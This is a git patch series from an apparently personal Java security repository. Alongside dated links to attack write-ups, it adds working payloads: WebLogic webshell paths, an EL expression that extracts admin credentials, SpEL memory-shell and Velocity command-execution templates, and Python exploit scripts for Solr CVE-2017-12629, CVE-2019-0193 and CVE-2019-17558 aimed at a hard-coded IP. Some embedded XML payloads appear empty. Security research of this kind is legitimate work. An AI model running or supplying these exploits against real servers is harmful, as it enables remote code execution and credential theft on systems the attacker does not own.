From e2739efb23208314e7993e725c8f7acdd80050f4 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sat, 26 Feb 2022 02:17:52 +0800 Subject: [PATCH 001/332] Update Readme.md --- "java\345\260\217\345\236\213\346\241\206\346\236\266/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\345\260\217\345\236\213\346\241\206\346\236\266/Readme.md" "b/java\345\260\217\345\236\213\346\241\206\346\236\266/Readme.md" index 9a445e4..41c4596 100644 --- "a/java\345\260\217\345\236\213\346\241\206\346\236\266/Readme.md" +++ "b/java\345\260\217\345\236\213\346\241\206\346\236\266/Readme.md" @@ -24,3 +24,4 @@ https://www.sec-in.com/author/8 这个师傅太猛了 + 2021/12/21 [绕过后缀安全检查进行文件上传](https://sec-in.com/article/647) **解决了条件竞争不知道文件名的问题,通过异常报错让程序停止向下执行绕过。(在multipart做文章)** + 2021/12/21 [绕过后缀安全检查进行文件上传-2](https://www.sec-in.com/article/1328) **只能说非常np了,servlet单例,属性在调用时会被共享,存在线程安全问题。扩展一下java中volatile有可能存在线程安全问题[参考](https://github.com/Firebasky/Java/blob/main/java%E6%97%A5%E5%B8%B8/Thinking_in_java%E9%AB%98%E7%BA%A7%E4%B9%8Bvolatile.md)** 看看能不能搭建一个环境复现一下。。。。 + 2022/01/31 [验证是否存在写文件漏洞小技巧](https://mp.weixin.qq.com/s?__biz=MzkyMDIxMjE5MA==&mid=2247483994&idx=1&sn=2d29f31afa27a3709b5dc9e46532230a&chksm=c19705ebf6e08cfdd6dc59937beee4a77110b3cac9958335a6cfdbd020d00f2f24a7033063f2&mpshare=1&scene=23&srcid=0131EzMk9fpayyNZeXFR8nhb&sharer_sharetime=1643561054742&sharer_shareid=33a823b10ae99f33a60db621d83241cb#rd) ++ 2022/02/26 [记一次曲折的weblogic上传webshell](https://chaserw.github.io/2021/11/05/%E8%AE%B0%E4%B8%80%E6%AC%A1%E6%9B%B2%E6%8A%98%E7%9A%84weblogic%E4%B8%8A%E4%BC%A0webshell/) From 31aac2488a00b32ee02daff92e144c6a28ecafff Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sun, 6 Mar 2022 14:48:15 +0800 Subject: [PATCH 002/332] Create Weblogic trick.md --- Weblogic/Weblogic trick.md | 29 +++++++++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 Weblogic/Weblogic trick.md 
diff --git a/Weblogic/Weblogic trick.md b/Weblogic/Weblogic trick.md new file mode 100644 index 0000000..6153bc9 --- /dev/null +++ b/Weblogic/Weblogic trick.md 
@@ -0,0 +1,29 @@ +## Weblogic trick + +## 写文件rce + +``` +\server\user_projects\domains\base_domain\servers\AdminServer\tmp\_WL_internal\bea_wls_internal\9j4dqk\war\shell.jsp +访问:\bea_wls_internal\shell.jsp + + +\server\wlserver\server\lib\consoleapp\webapp\framework\skins\wlsconsole\images\shell.jsp +访问:\console\framework\skins\wlsconsole\images\shell.jsp + +\server\user_projects\domains\base_domain\servers\AdminServer\tmp\_WL_internal\uddiexplorer\随机字符\war\shell.jsp +访问:\uddiexplorer\shell.jsp + +\Oracle\Middleware\user_projects\domains\application\servers\AdminServer\tmp\_WL_user\项目名\随机字符\war\shell.jsp + +访问:\项目名\shell.jsp +``` + +### 获得用户密码 + +https://github.com/TideSec/Decrypt_Weblogic_Password + +el表达式 + +```java +${pageContext.setAttribute("classLoader",Thread.currentThread().getContextClassLoader());pageContext.setAttribute("httpDataTransferHandler",pageContext.getAttribute("classLoader").loadClass("weblogic.deploy.service.datatransferhandlers.HttpDataTransferHandler"));pageContext.setAttribute("managementService", 
pageContext.getAttribute("classLoader").loadClass("weblogic.management.provider.ManagementService"));pageContext.setAttribute("authenticatedSubject",pageContext.getAttribute("classLoader").loadClass("weblogic.security.acl.internal.AuthenticatedSubject"));pageContext.setAttribute("propertyService",pageContext.getAttribute("classLoader").loadClass("weblogic.management.provider.PropertyService"));pageContext.setAttribute("KERNE_ID",pageContext.getAttribute("httpDataTransferHandler").getDeclaredField("KERNE_ID"));pageContext.getAttribute("KERNE_ID").setAccessible(true);pageContext.setAttribute("getPropertyService",managementService.getMethod("getPropertyService",pageContext.getAttribute("authenticatedSubject")));pageContext.getAttribute("getPropertyService").setAccessible(true);pageContext.setAttribute("prop",pageContext.getAttribute("getPropertyService").invoke(null,pageContext.getAttribute("KERNE_ID").get((null))));pageContext.setAttribute("getTimestamp1",propertyService.getMethod("getTimestamp1"));pageContext.getAttribute("getTimestamp1").setAccessible(true);pageContext.setAttribute("getTimestamp2",propertyService.getMethod("getTimestamp2"));pageContext.getAttribute("getTimestamp2").setAccessible(true);pageContext.setAttribute("username", pageContext.getAttribute("getTimestamp1").invoke(pageContext.getAttribute("prop")));pageContext.setAttribute("password",pageContext.getAttribute("getTimestamp2").invoke(pageContext.getAttribute("prop")));pageContext.getAttribute("username").concat("/").concat(pageContext.getAttribute("password"))} +``` From 720971490828437b667362bf3434645ec95a6108 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sun, 6 Mar 2022 15:47:12 +0800 Subject: [PATCH 003/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) 
diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index e8e39cd..ab82dd0 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -103,3 +103,4 @@ + 2022/02/10 [OpenRASP 两次绕过](https://mp.weixin.qq.com/s/hkL8VPHnTgFsOCCrNlRpzQ) **1.修改特征值 2.在静态代码里面开启新线程调用恶意方法** + 2022/02/21 **java 中存在编译时执行函数(注解的方式执行)** + 2022/02/23 [原创 | emoji、shiro与log4j2漏洞](https://mp.weixin.qq.com/s/mEwljigkkXk-y1ik7au_CQ) **通过fuzz报错记录log触发log4j2漏洞** ++ 2022/03/06 [Make JDBC Attacks Brilliant Again 番外篇](https://tttang.com/archive/1462/) **np!** From 0d3d23716129711c084f78a99ca41d1f2fa51534 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Mon, 7 Mar 2022 13:54:49 +0800 Subject: [PATCH 004/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index ab82dd0..48db83a 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -104,3 +104,4 @@ + 2022/02/21 **java 中存在编译时执行函数(注解的方式执行)** + 2022/02/23 [原创 | emoji、shiro与log4j2漏洞](https://mp.weixin.qq.com/s/mEwljigkkXk-y1ik7au_CQ) **通过fuzz报错记录log触发log4j2漏洞** + 2022/03/06 [Make JDBC Attacks Brilliant Again 番外篇](https://tttang.com/archive/1462/) **np!** ++ 2022/03/07 [Java Web —— 从内存中Dump JDBC数据库明文密码](https://mp.weixin.qq.com/s?__biz=Mzg5OTQ3NzA2MQ==&mid=2247485138&idx=1&sn=1229156e187fedd7b4aa4b1ac6c8f490&chksm=c053fdf8f72474eeb936fdfcefa43a74e2a7f661b9b98bff73330e5e661184440821047addf7&mpshare=1&scene=23&srcid=0307Aw2UzS1q0Fsdy5d2vqCD&sharer_sharetime=1646624025057&sharer_shareid=33a823b10ae99f33a60db621d83241cb#rd) **在connect之前hook任何写入用户名密码** From 7bed13897db58ca01feaa379dde883ed9692ea6a Mon Sep 17 00:00:00 2001 
From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Wed, 9 Mar 2022 13:06:15 +0800 Subject: [PATCH 005/332] Update Readme.md --- shell/SPEL/Readme.md | 2 ++ 1 file changed, 2 insertions(+) diff --git a/shell/SPEL/Readme.md b/shell/SPEL/Readme.md index 9cceae9..27a4c75 100644 --- a/shell/SPEL/Readme.md +++ b/shell/SPEL/Readme.md @@ -43,6 +43,8 @@ T(org.springframework.util.SerializationUtils).deserialize(T(com.sun.org.apache. //内存木马 回显 T(org.springframework.cglib.core.ReflectUtils).defineClass('Singleton',T(com.sun.org.apache.xml.internal.security.utils.Base64).decode('yv66vgAAADIAtQ....'),T(org.springframework.util.ClassUtils).getDefaultClassLoader()) +#{T(org.springframework.cglib.core.ReflectUtils).defineClass('Memshell',T(org.springframework.util.Base64Utils).decodeFromString('yv66vgAAA....'),new javax.management.loading.MLet(new java.net.URL[0],T(java.lang.Thread).currentThread().getContextClassLoader())).doInject()} + echo From d51d9bbede363b8f346814d82142b4b4549a7f71 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Mon, 14 Mar 2022 22:19:47 +0800 Subject: [PATCH 006/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 2 ++ 1 file changed, 2 insertions(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 48db83a..dbf04f5 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" 
@@ -105,3 +105,5 @@ + 2022/02/23 [原创 | emoji、shiro与log4j2漏洞](https://mp.weixin.qq.com/s/mEwljigkkXk-y1ik7au_CQ) **通过fuzz报错记录log触发log4j2漏洞** + 2022/03/06 [Make JDBC Attacks Brilliant Again 番外篇](https://tttang.com/archive/1462/) **np!** + 2022/03/07 [Java Web —— 从内存中Dump JDBC数据库明文密码](https://mp.weixin.qq.com/s?__biz=Mzg5OTQ3NzA2MQ==&mid=2247485138&idx=1&sn=1229156e187fedd7b4aa4b1ac6c8f490&chksm=c053fdf8f72474eeb936fdfcefa43a74e2a7f661b9b98bff73330e5e661184440821047addf7&mpshare=1&scene=23&srcid=0307Aw2UzS1q0Fsdy5d2vqCD&sharer_sharetime=1646624025057&sharer_shareid=33a823b10ae99f33a60db621d83241cb#rd) **在connect之前hook任何写入用户名密码** ++ 2022/03/14 [关于JavaWeb后门问题](https://wooyun.js.org/drops/%E6%94%BB%E5%87%BBJavaWeb%E5%BA%94%E7%94%A8[8]-%E5%90%8E%E9%97%A8%E7%AF%87.html) **思路不错,配置文件这些。。。** + From 2a741f7137129a70e30bfda89b4fbf69d3307c86 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Mon, 14 Mar 2022 23:33:57 +0800 Subject: [PATCH 007/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index dbf04f5..b5c0fb9 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" 
@@ -106,4 +106,4 @@ + 2022/03/06 [Make JDBC Attacks Brilliant Again 番外篇](https://tttang.com/archive/1462/) **np!** + 2022/03/07 [Java Web —— 从内存中Dump JDBC数据库明文密码](https://mp.weixin.qq.com/s?__biz=Mzg5OTQ3NzA2MQ==&mid=2247485138&idx=1&sn=1229156e187fedd7b4aa4b1ac6c8f490&chksm=c053fdf8f72474eeb936fdfcefa43a74e2a7f661b9b98bff73330e5e661184440821047addf7&mpshare=1&scene=23&srcid=0307Aw2UzS1q0Fsdy5d2vqCD&sharer_sharetime=1646624025057&sharer_shareid=33a823b10ae99f33a60db621d83241cb#rd) **在connect之前hook任何写入用户名密码** + 2022/03/14 [关于JavaWeb后门问题](https://wooyun.js.org/drops/%E6%94%BB%E5%87%BBJavaWeb%E5%BA%94%E7%94%A8[8]-%E5%90%8E%E9%97%A8%E7%AF%87.html) **思路不错,配置文件这些。。。** - ++ 2022/03/14 [weblogic下spring bean RCE的一些拓展](https://gv7.me/articles/2021/some-extensions-of-spring-bean-rce-under-weblogic/) **c0ny1师傅的文章一如既往的好** From a80bf7d03a9e2d944d7fa714b44986ddfa907162 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Tue, 15 Mar 2022 11:50:47 +0800 Subject: [PATCH 008/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index b5c0fb9..0130837 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" 
@@ -107,3 +107,4 @@ + 2022/03/07 [Java Web —— 从内存中Dump JDBC数据库明文密码](https://mp.weixin.qq.com/s?__biz=Mzg5OTQ3NzA2MQ==&mid=2247485138&idx=1&sn=1229156e187fedd7b4aa4b1ac6c8f490&chksm=c053fdf8f72474eeb936fdfcefa43a74e2a7f661b9b98bff73330e5e661184440821047addf7&mpshare=1&scene=23&srcid=0307Aw2UzS1q0Fsdy5d2vqCD&sharer_sharetime=1646624025057&sharer_shareid=33a823b10ae99f33a60db621d83241cb#rd) **在connect之前hook任何写入用户名密码** + 2022/03/14 [关于JavaWeb后门问题](https://wooyun.js.org/drops/%E6%94%BB%E5%87%BBJavaWeb%E5%BA%94%E7%94%A8[8]-%E5%90%8E%E9%97%A8%E7%AF%87.html) **思路不错,配置文件这些。。。** + 2022/03/14 [weblogic下spring bean RCE的一些拓展](https://gv7.me/articles/2021/some-extensions-of-spring-bean-rce-under-weblogic/) **c0ny1师傅的文章一如既往的好** ++ 2022/03/15 [Shiro后渗透拓展面](https://tttang.com/archive/1472/) **扩展了思路agnet dump 获得key!** From 4a68f833ba3d25ab7dbdcb258934b0cdc9783e41 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Wed, 16 Mar 2022 21:57:18 +0800 Subject: [PATCH 009/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 0130837..a8ae55d 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -108,3 +108,4 @@ + 2022/03/14 [关于JavaWeb后门问题](https://wooyun.js.org/drops/%E6%94%BB%E5%87%BBJavaWeb%E5%BA%94%E7%94%A8[8]-%E5%90%8E%E9%97%A8%E7%AF%87.html) **思路不错,配置文件这些。。。** + 2022/03/14 [weblogic下spring bean RCE的一些拓展](https://gv7.me/articles/2021/some-extensions-of-spring-bean-rce-under-weblogic/) **c0ny1师傅的文章一如既往的好** + 2022/03/15 [Shiro后渗透拓展面](https://tttang.com/archive/1472/) **扩展了思路agnet dump 获得key!** ++ 2022/03/16 [通过ql发现java gadgets](https://www.synacktiv.com/publications/finding-gadgets-like-its-2022.html) **可以参考文章的思路,sink和source,和中间的链。** From 738230db9747da355273246e273aab4a0615f275 Mon Sep 17 00:00:00 2001 
From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Fri, 18 Mar 2022 11:45:31 +0800 Subject: [PATCH 010/332] Update exp.txt --- .../Velocity/exp.txt" | 8 ++++++++ 1 file changed, 8 insertions(+) diff --git "a/java\346\250\241\346\235\277\346\263\250\345\205\245/Velocity/exp.txt" "b/java\346\250\241\346\235\277\346\263\250\345\205\245/Velocity/exp.txt" index e347b8a..2879893 100644 --- "a/java\346\250\241\346\235\277\346\263\250\345\205\245/Velocity/exp.txt" +++ "b/java\346\250\241\346\235\277\346\263\250\345\205\245/Velocity/exp.txt" @@ -4,3 +4,11 @@ $bizBean.class.class.forName('java.lang.Runtime').getMethod('getRuntime', null). #set($e="e") ${e.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec("calc")} +回显 +#set($x='') #set($rt=$x.class.forName('java.lang.Runtime')) +#set($chr=$x.class.forName('java.lang.Character')) +#set($str=$x.class.forName('java.lang.String')) +#set($ex=$rt.getRuntime().exec('id')) $ex.waitFor() +#set($out=$ex.getInputStream()) +#foreach($i in [1..$out.available()])$str.valueOf($chr.toChars($out.read())) +#end From 55beb3a855f98da6d64288c0db7e56d2a087b611 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Fri, 18 Mar 2022 11:49:19 +0800 Subject: [PATCH 011/332] Update README.md --- Solr/README.md | 186 ++++++++++++++++++++++++++++++++++++++++++++++++- 1 file changed, 185 insertions(+), 1 deletion(-) diff --git a/Solr/README.md b/Solr/README.md index 2edc0c1..38c86b8 100644 --- a/Solr/README.md +++ b/Solr/README.md 
@@ -1,4 +1,188 @@ # Apache Solr漏洞 **Apache Solr是一个开源的搜索服务,使用Java语言开发,主要基于HTTP和Apache Lucene实现的。** +>Solr是一个高性能,采用Java5开发,基于Lucene的全文搜索服务器。Solr是一个独立的企业级搜索应用服务器,很多企业运用solr开源服务。原理大致是文档通过Http利用XML加到一个搜索集合中。查询该集合也是通过 http收到一个XML/JSON响应来实现。它的主要特性包括:高效、灵活的缓存功能,垂直搜索功能,高亮显示搜索结果,通过索引复制来提高可用性,提 供一套强大Data Schema来定义字段,类型和设置文本分析,提供基于Web的管理界面等。 + + +https://github.com/Imanfeng/Apache-Solr-RCE + +## CVE-2017-12629 + +[CVE-2017-12629 - Apache Solr XXE & RCE 漏洞分析](https://paper.seebug.org/425/) + +```python +# -*- coding: utf-8 -* +# /usr/bin/python3 +# @Author:Firebasky +# xxe and rce +import requests +from urllib.parse import quote + +ip='101.35.196.173' +port='8983' + +''' + +"> +''' +def xxe(url): + exp = "%ext;%ent;]>&data;" + text = quote(exp, 'utf-8') + burp0_url = "http://"+ip+":"+port+"/solr/demo/select?q="+text+"&wt=xml&defType=xmlparser" + get = requests.get(burp0_url) + print(get.text) + +# 依据漏洞作者所披露的漏洞细节来看,RCE需要使用到SolrCloud Collections API,所以RCE只影响Solrcloud分布式系统。 +# /solr/admin/cores?wt=json 判断 +def rce(cmd):#不稳定,并且不知道路径 + burp0_url = "http://"+ip+":"+port+"/solr/demo/config" + burp0_headers = {"Accept": "*/*", "Accept-Language": "en", + "User-Agent": "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)", + "Connection": "close"} + burp0_json = { + "add-listener": {"args": ["-c", cmd], "class": "solr.RunExecutableListener", "dir": "/bin/", + "event": "postCommit", "exe": "sh", "name": "newlistener"}} + requests.post(burp0_url, headers=burp0_headers, json=burp0_json) + + burp0_json2=[{"id": "test"}] + requests.post(burp0_url, headers=burp0_headers, json=burp0_json2) + +if __name__ == '__main__': + # xxe("http://101.35.196.173:8080/do.dtd") + rce("touch /tmp/1") +``` + +## CVE-2019-0192 + +https://github.com/mpgn/CVE-2019-0192/blob/master/CVE-2019-0192.py + +## CVE-2019-0193 + +https://www.yuque.com/tianxiadamutou/zcfd4v/uyceyo#4785516e + +```python +# -*- coding: utf-8 -* +# /usr/bin/python3 +# @Author:Firebasky +import requests +from urllib.parse 
import quote + +def getinfo(remote): + burp0_url = remote + "/solr/admin/cores?wt=json" + r = requests.get(burp0_url, verify=False, allow_redirects=False) + if r.status_code == 200: + a = list(r.json()['status'].keys()) + # ressource = "/solr/" + a[0] + "/config" + # print(ressource) + return a[0] + else: + exit(0) + +#需要出网 +def exp1(url,info,cmd): + burp0_url = url+"/solr/"+info+"/dataimport?_=1647571813629&indent=on&wt=json" + burp0_headers = {"Accept": "application/json, text/plain, */*", "X-Requested-With": "XMLHttpRequest", + "Content-type": "application/x-www-form-urlencoded", "Connection": "close"} + burp0_data = {"command": "full-import", "verbose": "false", "clean": "false", "commit": "true", "debug": "true", + "core": "test", + "dataConfig": "\n \n \n \n \n \n", + "name": "dataimport"} + post = requests.post(burp0_url, headers=burp0_headers, data=burp0_data) + print(post.json()['documents']) + +def exp2(url,info,cmd): + burp0url = url+"/solr/"+info+"/config" + headers = {"Accept": "application/json, text/plain, */*", "X-Requested-With": "XMLHttpRequest", + "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36", + "Accept-Encoding": "gzip, deflate", "Accept-Language": "zh-CN,zh;q=0.9", "Connection": "close", + "Content-Type": "application/json"} + burp0_json = {"set-property": {"requestDispatcher.requestParsers.enableStreamBody": True}} + requests.post(burp0url, headers=headers, json=burp0_json) + + exp=''' + + + + + + + + ''' + text = quote(exp, 'utf-8') + text 
="%0a%3c%64%61%74%61%43%6f%6e%66%69%67%3e%0a%3c%64%61%74%61%53%6f%75%72%63%65%20%6e%61%6d%65%3d%22%73%74%72%65%61%6d%73%72%63%22%20%74%79%70%65%3d%22%43%6f%6e%74%65%6e%74%53%74%72%65%61%6d%44%61%74%61%53%6f%75%72%63%65%22%20%6c%6f%67%67%65%72%4c%65%76%65%6c%3d%22%54%52%41%43%45%22%20%2f%3e%0a%0a%20%20%3c%73%63%72%69%70%74%3e%3c%21%5b%43%44%41%54%41%5b%0a%20%20%20%20%20%20%20%20%20%20%66%75%6e%63%74%69%6f%6e%20%70%6f%63%28%72%6f%77%29%7b%0a%20%76%61%72%20%62%75%66%52%65%61%64%65%72%20%3d%20%6e%65%77%20%6a%61%76%61%2e%69%6f%2e%42%75%66%66%65%72%65%64%52%65%61%64%65%72%28%6e%65%77%20%6a%61%76%61%2e%69%6f%2e%49%6e%70%75%74%53%74%72%65%61%6d%52%65%61%64%65%72%28%6a%61%76%61%2e%6c%61%6e%67%2e%52%75%6e%74%69%6d%65%2e%67%65%74%52%75%6e%74%69%6d%65%28%29%2e%65%78%65%63%28%22"+quote(cmd,'utf-8')+"%22%29%2e%67%65%74%49%6e%70%75%74%53%74%72%65%61%6d%28%29%29%29%3b%0a%0a%76%61%72%20%72%65%73%75%6c%74%20%3d%20%5b%5d%3b%0a%0a%77%68%69%6c%65%28%74%72%75%65%29%20%7b%0a%76%61%72%20%6f%6e%65%6c%69%6e%65%20%3d%20%62%75%66%52%65%61%64%65%72%2e%72%65%61%64%4c%69%6e%65%28%29%3b%0a%72%65%73%75%6c%74%2e%70%75%73%68%28%20%6f%6e%65%6c%69%6e%65%20%29%3b%0a%69%66%28%21%6f%6e%65%6c%69%6e%65%29%20%62%72%65%61%6b%3b%0a%7d%0a%0a%72%6f%77%2e%70%75%74%28%22%74%69%74%6c%65%22%2c%72%65%73%75%6c%74%2e%6a%6f%69%6e%28%22%5c%6e%5c%72%22%29%29%3b%0a%72%65%74%75%72%6e%20%72%6f%77%3b%0a%0a%7d%0a%0a%5d%5d%3e%3c%2f%73%63%72%69%70%74%3e%0a%0a%3c%64%6f%63%75%6d%65%6e%74%3e%0a%20%20%20%20%3c%65%6e%74%69%74%79%0a%20%20%20%20%20%20%20%20%73%74%72%65%61%6d%3d%22%74%72%75%65%22%0a%20%20%20%20%20%20%20%20%6e%61%6d%65%3d%22%65%6e%74%69%74%79%31%22%0a%20%20%20%20%20%20%20%20%64%61%74%61%73%6f%75%72%63%65%3d%22%73%74%72%65%61%6d%73%72%63%31%22%0a%20%20%20%20%20%20%20%20%70%72%6f%63%65%73%73%6f%72%3d%22%58%50%61%74%68%45%6e%74%69%74%79%50%72%6f%63%65%73%73%6f%72%22%0a%20%20%20%20%20%20%20%20%72%6f%6f%74%45%6e%74%69%74%79%3d%22%74%72%75%65%22%0a%20%20%20%20%20%20%20%20%66%6f%72%45%61%63%68%3d%22%2f%52%44%46%2f%69%74%65%6d%2
2%0a%20%20%20%20%20%20%20%20%74%72%61%6e%73%66%6f%72%6d%65%72%3d%22%73%63%72%69%70%74%3a%70%6f%63%22%3e%0a%20%20%20%20%20%20%20%20%20%20%20%20%20%3c%66%69%65%6c%64%20%63%6f%6c%75%6d%6e%3d%22%74%69%74%6c%65%22%20%78%70%61%74%68%3d%22%2f%52%44%46%2f%69%74%65%6d%2f%74%69%74%6c%65%22%20%2f%3e%0a%20%20%20%20%3c%2f%65%6e%74%69%74%79%3e%0a%3c%2f%64%6f%63%75%6d%65%6e%74%3e%0a%3c%2f%64%61%74%61%43%6f%6e%66%69%67%3e%0a%20%20%20%20%0a%20%20%20%20%20%20%20%20%20%20%20" + burp0_url = url+"/solr/"+info+"/dataimport?command=full-import&verbose=false&clean=false&commit=false&debug=true&core=tika&name=dataimport&dataConfig="+text + burp0_headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:66.0) Gecko/20100101 Firefox/66.0", + "Accept": "application/json, text/plain, */*", + "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", + "Accept-Encoding": "gzip, deflate", + "content-type": "multipart/form-data; boundary=------------------------aceb88c2159f183f"} + burp0_data = "\r\n--------------------------aceb88c2159f183f\r\nContent-Disposition: form-data; name=\"stream.body\"\r\n\r\n\r\n\r\n\r\n\r\n\r\n--------------------------aceb88c2159f183f--" + requests_post = requests.post(burp0_url, headers=burp0_headers, data=burp0_data) + print(requests_post.json()['documents']) + +if __name__ == '__main__': + info = getinfo("http://101.35.196.173:8983") + # exp1("http://101.35.196.173:8983",info,"ls /tmp/") + exp2("http://101.35.196.173:8983",info,'ls /tmp/') +``` + +**jndi注入** + +``` + + + + + + + +``` + +## CVE-2019-17558 + +https://github.com/jas502n/solr_rce + +```python +# -*- coding: utf-8 -* +# /usr/bin/python3 +# @Author:Firebasky +# 在其 5.0.0 到 8.3.1版本中,用户可以注入自定义模板,通过Velocity模板语言执行任意命令。 +import requests + +url ="http://101.35.196.173:8983" +cmd ="ls" + +burp0_url = url + "/solr/admin/cores?wt=json" +r = requests.get(burp0_url, verify=False, allow_redirects=False) +a = list(r.json()['status'].keys()) + +burp0_url = 
url+"/solr/"+a[0]+"/config" +burp0_headers = {"Accept": "application/json, text/plain, */*", "X-Requested-With": "XMLHttpRequest", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36", "Accept-Encoding": "gzip, deflate", "Accept-Language": "zh-CN,zh;q=0.9", "Connection": "close", "Content-Type": "application/json"} +burp0_json={"update-queryresponsewriter": {"class": "solr.VelocityResponseWriter", "name": "velocity", "params.resource.loader.enabled": "true", "solr.resource.loader.enabled": "true", "startup": "lazy", "template.base.dir": ""}} +requests.post(burp0_url, headers=burp0_headers, json=burp0_json) + +burp0_url = url+"/solr/"+a[0]+"/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27"+cmd+"%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end" +burp0_headers = {"Accept": "application/json, text/plain, */*", "X-Requested-With": "XMLHttpRequest", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36", "Accept-Encoding": "gzip, deflate", "Accept-Language": "zh-CN,zh;q=0.9", "Connection": "close"} +get = requests.get(burp0_url, headers=burp0_headers) +print(get.text) +``` -Solr是一个高性能,采用Java5开发,基于Lucene的全文搜索服务器。Solr是一个独立的企业级搜索应用服务器,很多企业运用solr开源服务。原理大致是文档通过Http利用XML加到一个搜索集合中。查询该集合也是通过 http收到一个XML/JSON响应来实现。它的主要特性包括:高效、灵活的缓存功能,垂直搜索功能,高亮显示搜索结果,通过索引复制来提高可用性,提 供一套强大Data Schema来定义字段,类型和设置文本分析,提供基于Web的管理界面等。 From 746863036eb65e413937aa349150000554bfc80d Mon Sep 17 00:00:00 2001 
From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Fri, 18 Mar 2022 11:49:59 +0800 Subject: [PATCH 012/332] Update README.md --- README.md | 1 + 1 file changed, 1 insertion(+) diff --git a/README.md b/README.md index 25dff63..c8f82b9 100644 --- a/README.md +++ b/README.md @@ -21,6 +21,7 @@ + 2021/12/19 [添加Jenkins](Jenkins) 💛 💙 💜 ❤️ 💚 + 2022/01/14 [添加了dubbo漏洞分析](Dubbo) 💛 💙 💜 ❤️ 💚 + 2022/01/16 [添加CAS漏洞学习](CAS) 💛 💙 💜 ❤️ 💚 ++ 2022/03/18 [添加Solr利用exp](Solr) 💛 💙 💜 ❤️ 💚 From e3af77b41a0a43181c816f13143f012e8dffb991 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sun, 20 Mar 2022 22:19:05 +0800 Subject: [PATCH 013/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index a8ae55d..82cb663 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -109,3 +109,4 @@ + 2022/03/14 [weblogic下spring bean RCE的一些拓展](https://gv7.me/articles/2021/some-extensions-of-spring-bean-rce-under-weblogic/) **c0ny1师傅的文章一如既往的好** + 2022/03/15 [Shiro后渗透拓展面](https://tttang.com/archive/1472/) **扩展了思路agnet dump 获得key!** + 2022/03/16 [通过ql发现java gadgets](https://www.synacktiv.com/publications/finding-gadgets-like-its-2022.html) **可以参考文章的思路,sink和source,和中间的链。** ++ 2022/03/20 [使用 Burp 测试基于快速信息集的 Web 